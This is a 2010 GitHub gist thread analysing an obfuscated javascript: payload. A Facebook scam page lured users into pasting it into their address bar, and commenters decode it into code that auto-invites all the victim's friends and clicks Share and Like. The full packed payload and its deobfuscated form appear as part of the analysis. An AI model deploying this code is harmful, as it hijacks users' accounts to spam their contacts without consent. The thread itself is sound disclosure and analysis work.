Skip to content

Instantly share code, notes, and snippets.

@bruntonspall

bruntonspall/Evil Javascript

Created May 12, 2010 16:23
Show Gist options
  • Save bruntonspall/398782 to your computer and use it in GitHub Desktop.
Save bruntonspall/398782 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Evil Javascript
This app - http://www.facebook.com/pages/Only-5-of-rocket-scientists-know-the-answer-to-this/111715792203070?v=info#!/pages/Only-5-of-rocket-scientists-know-the-answer-to-this/111715792203070
uses social hacking to get you to paste the following javascript url into your address bar:
javascript:(function(){a='app115061155198097_jop';b='app115061155198097_jode';ifc='app115061155198097_ifc';ifo='app115061155198097_ifo';mw='app115061155198097_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];d[e[2]](e[1j])[e[1]][e[0]]=e[3]},1k)},1l)},1m)},O);',62,85,'||||||||||||||_0x82af|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||mw|fs|SocialGraphManager|for|in|if|20|ifo|ifc|21|2000|4000|3000'.split('|'),0,{}))})();
I've manually run the unpacker as far as getting
function (p,a,c,k,e,r)
{e=function(c)
{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String))
{
while(c--)
r[e(c)]=k[c]||e(c);
k=[ function(e){return r[e]}];
e=function(){return'\\w+'};
c=1
};
while(c--)
if(k[c])
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p
}
packer('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];d[e[2]](e[1j])[e[1]][e[0]]=e[3]},1k)},1l)},1m)},O);',62,85,'||||||||||||||_0x82af|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||mw|fs|SocialGraphManager|for|in|if|20|ifo|ifc|21|2000|4000|3000'.split('|'),0,{});
which returns
"var _0x82af=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x73\x6C\x69\x6E\x6B","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x70\x6F\x70\x5F\x63\x6F\x6E\x74\x65\x6E\x74"];d=document;d[_0x82af[2]](mw)[_0x82af[1]][_0x82af[0]]=_0x82af[3];d[_0x82af[2]](a)[_0x82af[4]]=d[_0x82af[2]](b)[_0x82af[5]];s=d[_0x82af[2]](_0x82af[6]);m=d[_0x82af[2]](_0x82af[7]);sl=d[_0x82af[2]](_0x82af[8]);c=d[_0x82af[10]](_0x82af[9]);c[_0x82af[12]](_0x82af[11],true,true);s[_0x82af[13]](c);setTimeout(function(){fs[_0x82af[14]]()},5000);setTimeout(function(){SocialGraphManager[_0x82af[17]](_0x82af[15],_0x82af[16]);setTimeout(function(){c[_0x82af[12]](_0x82af[11],true,true);sl[_0x82af[13]](c);setTimeout(function(){inp=document[_0x82af[19]](_0x82af[18]);for(i in inp){if(inp[i][_0x82af[5]]==_0x82af[20]){inp[i][_0x82af[13]](c)}};m[_0x82af[13]](c);setTimeout(function(){d[_0x82af[2]](ifo)[_0x82af[4]]=d[_0x82af[2]](ifc)[_0x82af[5]];d[_0x82af[2]](_0x82af[21])[_0x82af[1]][_0x82af[0]]=_0x82af[3]},2000)},4000)},3000)},5000);"
What does this do?
@paulbaumgart
Copy link 

> eval('var _0x82af=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x73\x6C\x69\x6E\x6B","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x70\x6F\x70\x5F\x63\x6F\x6E\x74\x65\x6E\x74"]')
> print(_0x82af)
visibility,style,getElementById,hidden,innerHTML,value,suggest,likeme,slink,MouseEvents,createEvent,click,initEvent,dispatchEvent,select_all,sgm_invite_form,/ajax/social_graph/invite_dialog.php,submitDialog,input,getElementsByTagName,Share,pop_content

@trun
Copy link

trun commented May 12, 2010

http://pastebin.com/Y6qq2Hgr

Looks like it probably invites all your friends to some garbage.

@jwillmoth
Copy link 

document.getElementById.('app115061155198097_mwrapper').style.visibility = 'hidden';

document.getElementById.('app115061155198097_jop').innerHTML = document.getElementById.('app115061155198097_jode').value;

objSuggest = document.getElementById('suggest');
objLikeme = document.getElementById('likeme');

objSlink = document.getElementById('slink');

mouseevents = document.createEvent(MouseEvents);
mouseevents.initEvent('click',true,true);

objSuggest.dispatchEvent(mouseevents);

setTimeout(
    function() {
        fs.select_all()
    },
    5000
);
    
setTimeout(
    function(){
        SocialGraphManager.submitDialog('sgm_invite_form','/ajax/social_graph/invite_dialog.php');
        setTimeout(
            function() {
                mouseevents.initEvent(click,true,true);
                objSlink.dispatchEvent(mouseevents);
                setTimeout(
                    function(){
                        inputs = document.getElementsByTagName('input');
                        for(i in inputs) {
                            if(inputs[i].value == 'Share') {
                                inputs[i].dispatchEvent(mouseevents)
                            }
                        };
                        objLikeme.dispatchEvent(mouseevents);
                        setTimeout(
                            function(){
                                document.getElementById.('app115061155198097_ifo').innerHTML = document.getElementById.('app115061155198097_ifc').value;
                                document.getElementById.('pop_content').style.visibility = hidden
                            },
                            2000
                        )
                    },
                    4000
                )
            },
            3000
        )
    },
    5000
);

@ntulip
Copy link

ntulip commented May 12, 2010

seems to be the first exploit based on the social graph. Facebook (assuming they've seen this) has probably disabled the app (115061155198097)

@bruntonspall
Copy link
Author

Excellent - thanks everyone!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment